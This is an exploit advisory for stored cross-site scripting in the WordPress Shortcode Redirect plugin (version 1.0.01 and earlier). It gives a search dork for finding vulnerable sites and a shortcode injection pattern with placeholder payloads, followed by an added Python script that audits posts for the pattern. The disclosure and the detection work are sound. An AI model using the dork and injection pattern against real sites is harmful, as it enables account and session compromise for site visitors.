# Exploit Title: WordPress Shortcode Redirect plugin <= 1.0.01 Stored XSS
# Dork: inurl:/wp-content/plugins/shortcode-redirect/
# Date: 2012/01/18
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip
# Version: 1.0.01
1) You need permissions to write a post (HTML mode) to exploit the shortcode:
[redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']
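
A defensive check for this issue, added here as an example (not part of the original advisory or the plugin's code): it scans stored post content for [redirect] shortcodes whose url or sec values contain characters that could break out of an HTML attribute. The function name, the flagging rules and the sample posts are assumptions constructed for illustration.

```python
import re

# Matches a [redirect ...] shortcode and captures its raw attribute string.
SHORTCODE_RE = re.compile(r"\[redirect\b([^\]]*)\]", re.IGNORECASE)
# name='value' | name="value" | name=bare
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)"|(\S+))""")
# Characters that can terminate an HTML attribute or open a tag.
UNSAFE_CHARS = re.compile(r"""["'<>]""")


def audit_post(content):
    """Return (shortcode, reasons) for each suspicious [redirect] in content."""
    findings = []
    for match in SHORTCODE_RE.finditer(content):
        attrs = {}
        for name, sq, dq, bare in ATTR_RE.findall(match.group(1)):
            attrs[name.lower()] = sq or dq or bare
        url = attrs.get("url", "")
        sec = attrs.get("sec", "")
        reasons = []
        if UNSAFE_CHARS.search(url):
            reasons.append("url contains attribute-breaking characters")
        if url and not re.match(r"https?://", url, re.IGNORECASE):
            reasons.append("url scheme is not http(s)")
        if sec and not re.fullmatch(r"[0-9]+", sec):
            reasons.append("sec is not a plain integer")
        if reasons:
            findings.append((match.group(0), reasons))
    return findings


# Constructed sample posts (not taken from a real site); MARKER is inert text.
SAMPLE_POSTS = {
    101: "Welcome! [redirect url='http://example.com/landing' sec='5']",
    102: "[redirect url='http://example.com/\"MARKER' sec='500\"MARKER']",
}

if __name__ == "__main__":
    for post_id, body in SAMPLE_POSTS.items():
        for shortcode, reasons in audit_post(body):
            print(f"post {post_id}: {shortcode}")
            for reason in reasons:
                print(f"  - {reason}")
```

In practice the strings would come from the site's stored post bodies; the lasting fix is for the plugin to escape both attributes and cast sec to an integer before output.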
2012/01/21